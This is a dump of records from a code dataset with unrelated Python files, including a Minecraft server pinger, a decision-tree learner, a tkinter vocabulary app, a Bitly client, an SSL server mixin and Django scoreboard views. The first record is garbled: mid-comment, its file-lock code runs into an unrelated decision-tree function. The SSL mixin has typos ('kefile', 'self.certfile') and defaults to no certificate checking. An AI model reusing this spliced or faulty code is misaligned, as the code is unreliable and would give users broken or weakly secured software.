seem to warn\n # about the extra \\x01 but normal servers do not.\n\n d = d.split(u'\\xa7')\n\n dlen = len(d)\n\n if dlen > 0:\n res['motd'] = escape(d[0], safemotd)\n if dlen > 1:\n res['players'] = int(d[1])\n if dlen > 2:\n res['max_players'] = int(d[2])\n\n return res\n\n\ndef clean_server(server):\n \"\"\" Get the sanitized host and port \"\"\"\n\n # add default port if necessary\n if server.find(\":\") < 0:\n server = server + \":25565\"\n\n (host, sep, port) = server.partition(\":\")\n host = safename.sub('-', host)[:MAX_DOMAIN_LEN].lower()\n port = safeport.sub('', port)\n\n return (host, port)\n\n\ndef filename(host, port):\n \"\"\" Get the filename corresponding to the server (may or may not exist) \"\"\"\n\n # note this may still generate an error if running on windows\n # since windows has a 260-char path limit\n return os.path.join(config['STORE_DIR'], \"%s(%s)\" % (host, port))\n\n\ndef check(server):\n \"\"\" Get the status of the server in a dict --\n runs a check if data is nonexistent or stale.\"\"\"\n\n needs = False # becomes True if data needs to be refreshed\n data = {'error': 'no data'} # default data\n\n (hostname, port) = clean_server(server)\n server = hostname + \":\" + port\n try:\n # try to use the IP for filename / pinging\n # to avoid breaking throttling if people\n # are using different domain names for\n # the same IP\n host = socket.gethostbyname(hostname)\n except Exception:\n host = hostname\n\n fname = filename(host, port)\n\n nowutc = datetime.now(tzutc())\n nowlocal = datetime.now(tzlocal())\n\n try:\n # load the old data if there is any\n f = open(fname, \"r\")\n data = json.load(f)\n f.close()\n\n # check staleness\n # (using default for timezone info, just in case, as old versions of canary weren't tz aware)\n last = dateutil.parser.parse(data[\"timestamp\"], default=nowlocal)\n if (last + timedelta(seconds=config['TIME_BETWEEN'])) <= nowutc:\n needs = True\n\n except (IOError, ValueError):\n # file does not exist or is 
malformed\n needs = True\n\n with filelock(fname + \".lock\") as fl:\n # only acquire the lock if needs is True\n # if it's already locked, needs will become False\n needs = needs and fl.acquire()\n\n if needs:\n # needs a refresh\n\n s = {}\n try:\n s = get_info(host, int(port))\n except socket.timeout:\n # timeout -> empty dict\n pass\n except:\n # server problem -> empty dict\n pass\n\n ndata = {\"timestamp\": nowutc.isoformat(),\n \"server\": server}\n\n if len(s) > 0:\n ndata[\"status\"] = \"up\"\n ndata[\"motd\"] = s[\"motd\"]\n ndata[\"players\"] = s[\"players\"]\n ndata[\"max_players\"] = s[\"max_players\"]\n ndata[\"server_version\"] = s[\"server_version\"]\n ndata[\"protocol_version\"] = s[\"protocol_version\"]\n else:\n ndata[\"status\"] = \"down\"\n\n # set time of last change\n ndata[\"lastchange\"] = ndata[\"timestamp\"]\n if \"status\" in data and data[\"status\"] == ndata[\"status\"] and \"lastchange\" in data:\n # status hasn't changed\n ndata[\"lastchange\"] = data[\"lastchange\"]\n\n # dump new data\n data = ndata\n data[\"reference_timestamp\"] = nowutc.isoformat()\n f = open(fname, \"w\")\n json.dump(data, f)\n f.close()\n\n fl.release()\n\n if not \"error\" in data:\n # Ensure correct server name\n # (Servers sharing an IP may have a different domain name in the saved data)\n data[\"server\"] = server\n\n # Add extra info\n data[\"min_refresh_interval\"] = config['TIME_BETWEEN']\n\n # if the file is already locked\n # this will return the old data\n # or if it's a new server, the default data\n return data\n\n\nclass filelock:\n\n \"\"\" A primitive exclusive lock on a file. \"\"\"\n\n def __init__(self, filename):\n self.filename = filename\n self.fd = None\n\n def acquire(self):\n \"\"\" Non-blocking. Returns True if lock successfully obtained, else False. 
\"\"\"\n try:\n # may not work if using NFS there is no 0 , return single node tree with label 1\n if (0 not in freq.keys()): \n root.label=1\n leaf +=1\n leaf_list.append(root)\n# print(\"base case 1: all ex positive, return with label:\",root.label)\n return root\n #if all examples negative=> no 1, return root with label 0\n if(1 not in freq.keys()): \n root.label=0\n leaf +=1\n leaf_list.append(root)\n# print(\"base case 2: all ex negative, return with label:\",root.label)\n return root \n if attributes==[]:\n# print(\"case 3: no more attributes\")\n return root\n else:\n Info_gain=find_information_gain(dataset, attributes) \n root_calculated= sort_gain(Info_gain)\n root.data= root_calculated \n attributes_m= attributes[:] \n# print(\"Node number\",node_no, \" is:\",root.data)\n if freq[0]>freq[1]:\n root.label=0\n else:\n root.label=1 \n root.zero = Node('newNode')\n data_zero = dataset.loc[dataset[root.data]==0]\n if data_zero.empty:\n# print(\"data empty on zero side, label should be\", root.label)\n root.zero.label= root.label\n leaf +=1\n leaf_list.append(root)\n node_no= node_no+1\n root.zero.id=node_no\n# print(root.id)\n node_list.append(root.zero)\n return root.zero\n else:\n# print(\"zero side: recursing after removing attr\",root.data)\n attributes.remove(root.data)\n root.zero= decision_tree(data_zero, target, attributes)\n \n root.one = Node('newNode2')\n data_one= dataset.loc[dataset[root.data]==1]\n if data_one.empty:\n# print(\"data empty on one side, label should be\", root.label)\n root.one.label= root.label\n leaf +=1\n leaf_list.append(root)\n node_no= node_no+1\n root.one.id=node_no\n# print(root.id)\n node_list.append(root.one)\n return root.one\n else:\n# print(\"one side: recursing after removing attr\",root.data)\n attributes_m.remove(root.data)\n root.one= decision_tree(data_one, target, attributes_m)\n return root\n \ndef measure_accuracy(start_node, dataset):\n columns= dataset.shape[1]\n rows= dataset.shape[0]\n correct=0\n 
start=start_node\n for i in range(0,rows):\n target = dataset.iloc[i,columns-1]\n while(start_node.zero or start_node.one):\n val= dataset.loc[i,[start_node.data]]\n if(val.iloc[0]==0):\n start_node=start_node.zero\n else:\n start_node=start_node.one\n predicted_target = start_node.label\n start_node=start\n if target == predicted_target:\n correct +=1\n# else:\n# print(\"check row:\",i,\"\",dataset.iloc[i,])\n accuracy= (correct/rows)*100 \n return accuracy\n\ndef print_tree(prefix,root):\n if(not root.zero):\n print (\"\",root.label) \n else:\n if(root.zero.zero): \n prefix+=\"| \"\n print(prefix,root.data,\"= 0 :\") \n else: \n prefix+=\"| \"\n print(prefix,root.data,\"= 0 :\",end=\"\")\n \n print_tree(prefix,root.zero) \n if(root.one.one): \n print(prefix,root.data,\"= 1 :\") \n else: \n print(prefix,root.data,\"= 1 :\",end=\"\")\n print_tree(prefix, root.one)\n \nif __name__ == '__main__':\n training_set=pd.read_csv(\"training_set.csv\")\n data_attr= training_set.columns.values\n data_attributes= data_attr.tolist()\n data_attributes.remove('Class')\n node_no=0\n leaf=0\n node_list=[]\n leaf_list=[]\n root = decision_tree(training_set, 'Class', data_attributes )\n print(\"=========================================================\")\n print(\"root:\",root.data)\n print(\"number of nodes:\",node_no)\n print(\"number of leaf nodes:\", leaf)\n non_leaf_list=node_list[:]\n for node in leaf_list:\n non_leaf_list.remove(node) \n \n print(\"=========================================================\")\n print(\"Now measuring accuracy\")\n test_set=pd.read_csv(\"test_set.csv\")\n m=measure_accuracy(root, test_set)\n print(\"Accuracy on this dataset is:\",m,\"%\")\n \n#test tree\n wesley= Node(\"Wesley\")\n wesley.id=1\n honor = Node(\"Honor\")\n honor.id=2\n barcly= Node(\"Barcly\")\n barcly.id=3\n tea= Node(\"Tea\")\n tea.id=4\n wesley.zero=honor\n wesley.one= Node(\"new\")\n wesley.one.label = 0\n wesley.one.id=5\n honor.zero=barcly\n honor.one=tea\n barcly.zero = 
Node(\"new\")\n barcly.zero.label=1\n barcly.zero.id=6\n barcly.one = Node(\"new\")\n barcly.one.label=0\n barcly.one.id=7\n tea.zero = Node(\"new\")\n tea.zero.label=1\n tea.zero.id=8\n tea.one = Node(\"new\")\n tea.one.label=0\n tea.one.id=9\n\n print_tree(\"\",root)\n \n \n \n \n\n\n\n\n\n\n\n\n \n\n\n","sub_path":"information_gain.py","file_name":"information_gain.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"15369144","text":"from __future__ import print_function, unicode_literals\n#import cartopy as cpy\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nimport json\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.colors as mc\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport xarray as xr\nimport xarray.ufuncs as xu\nimport seaborn as sns\n#from netCDF4 import Dataset\n#from mpl_toolkits.basemap import Basemap\n#import mercantile as mti\nfrom copy import copy\n\n\n\ntilesize = 768\ndpi = 288\n#TERESA: Change teh fpath to look at different files. the directory YYYYMMDD contains simulaions related to that date, and the file name refers tot he specefic hour. \n#change the op_png to the path you want: it'll have to be in your own directory becuase that's where you can write. 
\nfpath='/mnt/raid/wrf-chem/wrfchem_v415/data_back/20200513/output-wrf' \nfnm='d01_202005141800.nc'\nop_png='/mnt/raid/wrf-chem/wrfchem_v415/bc_grid_140520_1800_2.png'\nf_path=os.path.join(fpath, fnm)\n \n \ndata = xr.open_dataset(f_path)\nLON= data.lon\nLAT=data.lat\n\nextents = {\n #'ireland': [-12, -3, 51, 55.5]\n#IRE domain\n 'europe':[LON.min(),LON.max(),LAT.min(),LAT.max()-1]\n }\n#lev_range=range(0,10) \n#levels=lev_range\n\nfor dom in extents:\n\n\n print('loms', LON.shape)\n print('lats', LAT.shape)\n print ('terrain', data.terrain.values[:,:].shape )\n #t2_out_path=('hgt_raw_'+dom+'.png')\n #lev_range=np.linspace(0, 1.5, num=15, endpoint=False)\n #lev_range=np.logspace(0, 20, num=15, endpoint=False)\n bounds=[0.01, 0.02, 0.03, 0.05, 0.07, 0.1, 0.2, 0.3, 0.5, 0.7, 1, 2, 3, 5, 7, 10, 20, 30]\n lev_range=np.array(bounds)\n levels=lev_range\n print(levels)\n norm = mc.BoundaryNorm(boundaries=bounds, ncolors=256)\n fig=plt.figure(figsize=(10,6), dpi=dpi)\n ax=fig.add_subplot(111, projection=ccrs.Mercator())\n print('2')\n print(data.bc.shape)\n cs=ax.contourf(LON, LAT, data.bc.values[0, :,:]*1.2, norm=norm, levels=levels, cmap=plt.cm.jet, extend=\"both\", transform=ccrs.PlateCarree())\n #cs=ax.contourf(LON, LAT, data.bc.values[0, :,:], cmap=plt.cm.jet, extend=\"both\", transform=ccrs.PlateCarree())\n #cs=ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,\n #linewidth=2, color='gray', alpha=0.5, linestyle='--')\n cbar = fig.colorbar(cs,ticks=lev_range, shrink=1.2)\n #cbar.ax.set_yticklabels(lev_range)\n# plt.box(on=None)\n#plt.subplots_adjust(bottom=0, left=0, right=1, top=1, hspace = 0, wspace = 0)\n #extents=[LON.min(),LON.max(),LAT.min(),LAT.max()]\n print(extents)\n ax.set_extent(extents[dom])\n ax.coastlines('10m', linewidth=0.15)\n #plt.axis('off')\n #ax.figsize=(tilesize/dpi, tilesize/dpi)\n ax.dpi=dpi\n plt.savefig(op_png, dpi=288, tilesize=768, transparent=True)\n 
plt.close()\n","sub_path":"wrfchem_v415_ext/scripts/components/old2/plot_grid.py","file_name":"plot_grid.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"325460495","text":"class Comparator(object):\n ''' Custom comparator based on the order of initialization\n\n Args:\n e1 (int): first element\n e2 (int): second element\n '''\n\n def __init__(self, e1, e2):\n assert isinstance(e1, int), 'First argument is not an integer'\n assert isinstance(e2, int), 'Second argument is not an integer'\n\n self.e1 = e1\n self.e2 = e2\n\n def compare(self, x, y):\n ''' Compare x, y based on comparator init.\n\n Returns:\n True if x, y follow the same order as self.e1 and self.e2\n False otherwise\n '''\n assert isinstance(x, int), 'First argument is not an integer'\n assert isinstance(y, int), 'Second argument is not an integer'\n\n if self.e1 <= self.e2:\n return x <= y\n else:\n return x >= y\n\n\ndef longest_list(L1, L2):\n return L1 if len(L1) >= len(L2) else L2\n\n\ndef first_run(L):\n ''' Find the first run in list L\n\n Args:\n L (list): list of integers containing at least 2 elements\n\n Returns:\n run (list): the first ascending or descending run in L\n '''\n assert isinstance(L, list), 'Argument is not a list'\n assert len(L) >= 2, 'List argument must contains at least 2 elements'\n\n run = L[0:2]\n aComp = Comparator(run[0], run[1])\n for i in range(2, len(L)):\n if aComp.compare(run[-1], L[i]):\n run.append(L[i])\n else:\n break\n return run\n\n\ndef longest_run(L):\n '''\n Assumes L is a list of integers containing at least 2 elements.\n Finds the longest run of numbers in L, where the longest run can\n either be monotonically increasing or monotonically decreasing.\n In case of a tie for the longest run, choose the longest run\n that occurs first.\n Does not modify the list.\n\n Args:\n L (list): list of integers containing at least 2 elements\n\n Returns:\n (int): the 
sum of the longest run.\n '''\n assert isinstance(L, list), 'Argument is not a list'\n assert len(L) >= 2, 'List argument must contains at least 2 elements'\n\n def longest_run_recur(L):\n ''' Recursive version for longest_run, not including the sum\n in order to be recursive\n Args:\n L (list): list of integers containing at least 2 elements\n '''\n assert isinstance(L, list), 'Argument is not a list'\n assert len(L) >= 2, 'List argument must contains at least 2 elements'\n\n run = first_run(L)\n # New list contains last element of run\n new_list = L[len(run) - 1:]\n if len(new_list) > 1:\n return longest_list(run, longest_run_recur(new_list))\n else:\n return run\n\n return sum(longest_run_recur(L))\n\n\ndef main():\n L1 = [5, 4, 3]\n L2 = [10, 4, 3, 8, 3, 4, 5, 7, 7, 2]\n L3 = [5, 4, 10]\n L = [L1, L2, L3]\n for l in L:\n print('longest run: ' + str(longest_run(l)))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Final exam/longest_run.py","file_name":"longest_run.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"354420342","text":"import tkinter as tk\nimport tkinter.messagebox as tkm\nimport fileOperations as fOp\nimport game as gm\nfrom PIL import Image, ImageTk\n\nPLAY = 0\nADD = 1\n\n\nclass EvtWindow:\n\n def __init__(self):\n \"\"\"\n in constructor are created start components:\n - label with header\n - image with flag\n - button to start playing game and button to add file with vocabulary\n \"\"\"\n self.__root = tk.Tk()\n self.__lHeader = tk.Label(text=\"English Vocabulary Tester\", bg=\"white\", fg=\"black\")\n self.__lHeader.config(font=(\"Courier\", 25))\n self.__iFlag = ImageTk.PhotoImage(Image.open(\"flag.jpg\"))\n self.__lFlag = tk.Label(self.__root, image=self.__iFlag)\n self.__bPlay = tk.Button(self.__root, text=\"Play\", command=self.__start_game)\n self.__bPlay.config(font=(\"Courier\", 20))\n self.__bAdd = tk.Button(self.__root, 
text=\"Add\", command=self.__add_word)\n self.__bAdd.config(font=(\"Courier\", 20))\n\n # confirm button (will be used later)\n self.__bConfirm = tk.Button(self.__root, text=\"Confirm\")\n self.__bConfirm.config(font=(\"Courier\", 15))\n\n self.__grid_start_window()\n self.__root.tk.mainloop()\n\n def __start_game(self):\n \"\"\"\n user pressed play and then has to choose file with vocabulary to be able to start game\n \"\"\"\n txt_files = fOp.traverse_directory() # list of txt files with vocabulary\n self.__txt_files_menu(txt_files, PLAY)\n\n # user chose file with vocabulary\n def __game(self):\n file_name = self.__default.get()\n self.__lFlag.grid_forget()\n self.__lDrop_down.grid_forget()\n self.__drop_down.grid_forget()\n self.__bConfirm.grid_forget()\n # getting list of words from txt_file(translation is also here)\n words = fOp.get_words(file_name)\n game = gm.Game(words, self.__root) # creating new object of game\n game.perform() # this method performs game in game object\n\n # user pressed add and now has to choose file and put word\n def __add_word(self):\n txt_files = fOp.traverse_directory() # list of txt files with vocabulary\n self.__clear_start_window()\n self.__bAddExisting = tk.Button(\n self.__root, text=\"Add to existing file\", command=lambda: self.__txt_files_menu(txt_files, ADD))\n self.__bAddNew = tk.Button(self.__root, text=\"Add to new file\", command=self.__get_name)\n self.__bAddExisting.config(font=(\"Courier\", 15))\n self.__bAddNew.config(font=(\"Courier\", 15))\n self.__bAddExisting.grid(row=2, column=0, sticky=\"NSEW\")\n self.__bAddNew.grid(row=2, column=1, sticky=\"NSEW\")\n\n def __grid_start_window(self):\n \"\"\"\n this method places start components in window\n \"\"\"\n self.__lHeader.grid(row=0, column=0, columnspan=2)\n self.__lFlag.grid(row=1, column=0, columnspan=2)\n self.__bPlay.grid(row=2, column=0, sticky=\"NSEW\")\n self.__bAdd.grid(row=2, column=1, sticky=\"NSEW\")\n\n def __clear_start_window(self):\n \"\"\"\n 
removing unnecessary components\n \"\"\"\n self.__bPlay.grid_forget()\n self.__bAdd.grid_forget()\n\n # drop down menu with txt files\n def __txt_files_menu(self, txt_files, mode):\n # adding button not necessary\n if mode == ADD:\n self.__bAddExisting.grid_forget()\n self.__bAddNew.grid_forget()\n if len(txt_files) > 0:\n # label with instruction\n self.__lDrop_down = tk.Label(text=\"Choose file\")\n self.__lDrop_down.grid(row=2, column=0)\n # drop_down menu\n self.__default = tk.StringVar(self.__root)\n self.__default.set(txt_files[0])\n self.__drop_down = tk.OptionMenu(self.__root, self.__default, *txt_files)\n self.__drop_down.grid(row=2, column=1)\n self.__clear_start_window()\n if mode == ADD:\n self.__bConfirm.config(command=lambda: self.__add_to_file(\"drop_down\"))\n if mode == PLAY:\n self.__bConfirm.config(command=self.__game)\n self.__bConfirm.grid(row=3, column=0, columnspan=2)\n else:\n tkm.showerror(\"Error\", \"Files not found\")\n self.__bPlay.grid(row=2, column=0, sticky=\"NSEW\")\n self.__bAdd.grid(row=2, column=1, sticky=\"NSEW\")\n\n # name of new file with vocabulary\n def __get_name(self):\n self.__bAddExisting.grid_forget()\n self.__bAddNew.grid_forget()\n # label with instruction\n self.__lNewFile = tk.Label(text=\"Enter name of file\")\n self.__lNewFile.grid(row=2, column=0)\n # entry with new name of file\n self.__eNewFile = tk.Entry(self.__root)\n self.__eNewFile.grid(row=2, column=1)\n self.__bConfirm.config(command=lambda: self.__add_to_file(\"entry\"))\n self.__bConfirm.grid(row=3, column=0, columnspan=2)\n\n # final addition\n def __add_to_file(self, name_source):\n if name_source == \"drop_down\":\n file_name = self.__default.get()\n self.__lDrop_down.grid_forget()\n self.__drop_down.grid_forget()\n self.__bConfirm.grid_forget()\n\n if name_source == \"entry\":\n file_name = self.__eNewFile.get()\n self.__lNewFile.grid_forget()\n self.__eNewFile.grid_forget()\n\n self.__lNewWord = tk.Label(text=\"Enter word\")\n self.__lTranslation 
= tk.Label(text=\"Enter translation\")\n self.__eNewWord = tk.Entry(self.__root)\n self.__eTranslation = tk.Entry(self.__root)\n self.__lNewWord.grid(row=2, column=0)\n self.__eNewWord.grid(row=2, column=1)\n self.__lTranslation.grid(row=3, column=0)\n self.__eTranslation.grid(row=3, column=1)\n self.__bConfirm.config(command=lambda: self.__put_in_file(file_name))\n self.__bConfirm.grid(row=4, column=0, columnspan=2)\n\n # add word to file\n def __put_in_file(self, file_name):\n self.__word = self.__eNewWord.get()\n self.__translation = self.__eTranslation.get()\n with open('vocabulary/' + file_name, 'a+') as f:\n f.write(self.__word)\n f.write(\"\\n\")\n f.write(self.__translation)\n f.write(\"\\n\")\n self.__finish_add()\n\n # after finishing word addition we can back to start window\n def __finish_add(self):\n self.__lNewWord.grid_forget()\n self.__lTranslation.grid_forget()\n self.__eNewWord.grid_forget()\n self.__eTranslation.grid_forget()\n self.__bConfirm.grid_forget()\n self.__grid_start_window()\n","sub_path":"venv/Source/evt_window.py","file_name":"evt_window.py","file_ext":"py","file_size_in_byte":6653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"103643089","text":"# -*- coding: utf-8 -*-\n\nimport requests\n\nBITLY_API_URL = 'https://api-ssl.bitly.com'\nBITLY_SHORTER_URL = BITLY_API_URL + '/v3/shorten'\n\n\nclass BitlyException(Exception):\n\n def __init__(self, payload):\n super(BitlyException, self).__init__('Can\\'t generate short link.')\n self.payload = payload\n\n\nclass Bitly(object):\n\n def __init__(self, token, domain=None):\n if not token:\n raise ValueError('token is empty.')\n\n self.token = token\n self.domain = domain or ''\n\n def shorten(self, url):\n if not url:\n raise ValueError('url is empty.')\n\n response = requests.get(BITLY_SHORTER_URL, params={\n 'domain': self.domain,\n 'access_token': self.token,\n 'longUrl': url,\n 'format': 'json'\n })\n\n if response.status_code 
== 200 and response.json().get('status_code') == 200:\n return response.json().get('data', {}).get('url', url)\n else:\n raise BitlyException(response.json())\n","sub_path":"exemplos_python/bitly.py","file_name":"bitly.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"619863512","text":"# Using mixin to add support of ssl\n\nimport ssl\n\nclass SSLMixin:\n\t'''\n\tMixin class that adds support for SSL to existing servers based on \n\tthe socketserver module.\n\t'''\n\tdef __init__(self, *args, keyfile=None, certfile=None, ca_certs=None, cert_reqs=ssl.CERT_NONE, **kwargs):\n\t\tself._keyfile = keyfile\n\t\tself._certfile = certfile\n\t\tself._ca_certs = ca_certs\n\t\tself._cert_reqs = cert_reqs\n\t\tsuper().__init__(*args, **kwargs)\n\n\tdef get_request(self):\n\t\tclient, addr = super().get_request()\n\t\tclient_ssl = ssl.wrap_socket(client, kefile = self._keyfile,\n\t\t\t\t\tcertfile = self.certfile,\n\t\t\t\t\tca_certs = self._ca_certs,\n\t\t\t\t\tcert_reqs = self._cert_reqs,\n\t\t\t\t\tserver_side = True)\n\t\treturn client_ssl, addr\n\n","sub_path":"11_net_programming/10_add_ssl_support_for_network/sslmixin.py","file_name":"sslmixin.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"129817084","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# 
limitations under the License.\n#\n# Contributer(s): Mani M. (manionline.org)\n\nfrom __future__ import print_function\nimport sys\nimport re\nimport operator\n\nclass WordCounter:\n def __init__(self, blacklist = None):\n self.tokenizer = re.compile(\"\\W+\")#re.compile(\"\\b(\\w)+\\b\")\n self.blacklist = blacklist if isinstance(blacklist, set) else set()\n self.reset()\n\n def reset(self):\n self.words = dict()\n self.update_counter = 0\n \n def update(self, text):\n self.update_counter += 1\n words = self.tokenizer.split(text)\n for w in words:\n w = w.lower()\n if len(w)>1 and w not in self.blacklist:\n if w in self.words.keys():\n self.words[w] += 1\n else:\n self.words[w] = 1\n def toCSV(self):\n for word, count in sorted(\n self.words.items(), key=operator.itemgetter(1), reverse=True):\n print(\"%s, %s\" % (word, count), file=sys.stdout)\n\ndef main():\n if len(sys.argv) == 1:\n print(\"Usage: python pot-stat.py potfile1.pot potfile2.pot ...\")\n exit(1)\n\n msgid = re.compile(\"msgid \\\"(.*)\\\"\")\n wc = WordCounter()\n\n prev_msgs = 0\n prev_tokens = 0\n for filename in sys.argv[1:]:\n with open(filename) as lines:\n for l in lines:\n match = msgid.split(l)\n if len(match) == 3:\n wc.update(match[1])\n \n print(\"%s: %s messages, %s tokens\" % (filename, wc.update_counter - prev_msgs, len(wc.words) - prev_tokens), file=sys.stderr)\n prev_tokens = len(wc.words)\n prev_msgs = wc.update_counter\n\n print(\"Total: %s messages, %s tokens\" % (wc.update_counter, len(wc.words)), file=sys.stderr)\n wc.toCSV()\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"pot-stat.py","file_name":"pot-stat.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"473326475","text":"from datetime import datetime, timedelta\nimport os\nimport logging\n\nfrom django.http import HttpResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom rcon.config import 
get_config\nfrom rcon.utils import MapsHistory\nfrom rcon.recorded_commands import RecordedRcon\nfrom rcon.commands import CommandFailedError\nfrom rcon.steam_utils import get_steam_profile\nfrom rcon.settings import SERVER_INFO\nfrom rcon import game_logs\nfrom rcon.models import (\n LogLine,\n PlayerSteamID,\n PlayerName,\n enter_session,\n Maps,\n PlayerStats,\n)\nfrom rcon.discord import send_to_discord_audit\nfrom rcon.scoreboard import LiveStats, TimeWindowStats, get_cached_live_game_stats, current_game_stats\n\nfrom .views import ctl, _get_data\nfrom .auth import api_response, login_required\nfrom rcon.utils import map_name, LONG_HUMAN_MAP_NAMES\n\nlogger = logging.getLogger(\"rconweb\")\n\n\n@csrf_exempt\ndef live_scoreboard(request):\n stats = LiveStats()\n config = get_config()\n\n try:\n result = stats.get_cached_stats()\n result = {\n \"snapshot_timestamp\": result[\"snapshot_timestamp\"],\n \"refresh_interval_sec\": config.get('LIVE_STATS', {}).get('refresh_stats_seconds', 30),\n \"stats\": result[\"stats\"],\n }\n error = (None,)\n failed = False\n except Exception as e:\n logger.exception(\"Unable to produce live stats\")\n result = {}\n error = \"\"\n failed = True\n\n return api_response(\n result=result, error=error, failed=failed, command=\"live_scoreboard\"\n )\n\n\n@csrf_exempt\ndef get_scoreboard_maps(request):\n data = _get_data(request)\n\n page_size = min(int(data.get(\"limit\", 100)), 1000)\n page = max(1, int(data.get(\"page\", 1)))\n server_number = data.get(\"server_number\", os.getenv(\"SERVER_NUMBER\"))\n\n with enter_session() as sess:\n query = (\n sess.query(Maps)\n .filter(Maps.server_number == server_number)\n .order_by(Maps.start.desc())\n )\n total = query.count()\n res = query.limit(page_size).offset((page - 1) * page_size).all()\n\n return api_response(\n result={\n \"page\": page,\n \"page_size\": page_size,\n \"total\": total,\n \"maps\": [\n dict(\n just_name=map_name(r.map_name),\n 
long_name=LONG_HUMAN_MAP_NAMES.get(r.map_name, r.map_name),\n **r.to_dict(),\n )\n for r in res\n ],\n },\n failed=False,\n command=\"get_scoreboard_maps\",\n )\n\n@csrf_exempt\ndef get_map_scoreboard(request):\n data = _get_data(request)\n error = None\n failed = False\n game = None\n\n try:\n map_id = int(data.get(\"map_id\", None))\n with enter_session() as sess:\n game = sess.query(Maps).filter(Maps.id == map_id).one_or_none()\n #import ipdb; ipdb.set_trace()\n if not game:\n error = \"No map for this ID\"\n failed = True\n else:\n game = game.to_dict(with_stats=True)\n except Exception as e:\n game = None\n error = repr(e)\n failed = True\n \n return api_response(\n result=game, error=error, failed=failed, command=\"get_map_scoreboard\"\n )\n\n@csrf_exempt\ndef get_live_game_stats(request):\n stats = None \n error_ = None\n failed = True\n\n try:\n stats = get_cached_live_game_stats()\n failed = False\n except Exception as e:\n logger.exception(\"Failed to get live game stats\")\n error_ = repr(e)\n\n return api_response(\n result=stats, error=error_, failed=failed, command=\"get_live_game_stats\"\n )\n \n@csrf_exempt\n@login_required\ndef date_scoreboard(request):\n try:\n start = datetime.fromtimestamp(request.GET.get(\"start\"))\n except (ValueError, KeyError, TypeError) as e:\n start = datetime.now() - timedelta(minutes=60)\n try:\n end = datetime.fromtimestamp(request.GET.get(\"end\"))\n except (ValueError, KeyError, TypeError) as e:\n end = datetime.now()\n\n stats = TimeWindowStats()\n\n try:\n result = stats.get_players_stats_at_time(start, end)\n error_ = (None,)\n failed = False\n\n except Exception as e:\n logger.exception(\"Unable to produce date stats\")\n result = {}\n error_ = \"\"\n failed = True\n\n return api_response(\n result=result, error=error_, failed=failed, command=\"date_scoreboard\"\n 
)\n","sub_path":"rconweb/api/scoreboards.py","file_name":"scoreboards.py","file_ext":"py","file_size_in_byte":4582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"621115200","text":"import urllib\nimport urllib.request\nimport urllib.parse\nimport xml.etree.ElementTree as ET\n\nurl = \"http://zip.cgis.biz/xml/zip.php?zn=2450018\"\n\nreq = urllib.request.Request(url)\nwith urllib.request.urlopen(req) as response:\n\txml_string = response.read()\n\nroot = ET.fromstring(xml_string.decode())\nroot = ET.fromstring(xml_string)\nzipcode_head = []\nzipcode = []\n\nfor i in root.findall('./ADDRESS_value/*'):\n\tfor h in i.attrib:\n\t\tzipcode_head.append(h)\n\t\tzipcode.append(i.attrib[h])\n\nzipcode_head_csv = \",\".join(map(str,zipcode_head))\nzipcode_csv = \",\".join(map(str,zipcode))\n\nprint(zipcode_head_csv+zipcode_csv)\n","sub_path":"api/zipcode_2.py","file_name":"zipcode_2.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"554311756","text":"\"\"\"added users_ab_testing_assignments table\n\nRevision ID: 150a94ceef02\nRevises: ab4c1fa6dea\nCreate Date: 2015-05-17 19:57:16.952700\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '150a94ceef02'\ndown_revision = 'ab4c1fa6dea'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users_ab_testing_assignments',\n sa.Column('user_id', sa.String(length=2000), nullable=True),\n sa.Column('ab_test_name', sa.String(length=2000), nullable=True),\n sa.Column('ab_test_group', sa.String(length=2000), nullable=True),\n sa.Column('assigned_time', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users_user.id'], ondelete='SET NULL')\n )\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
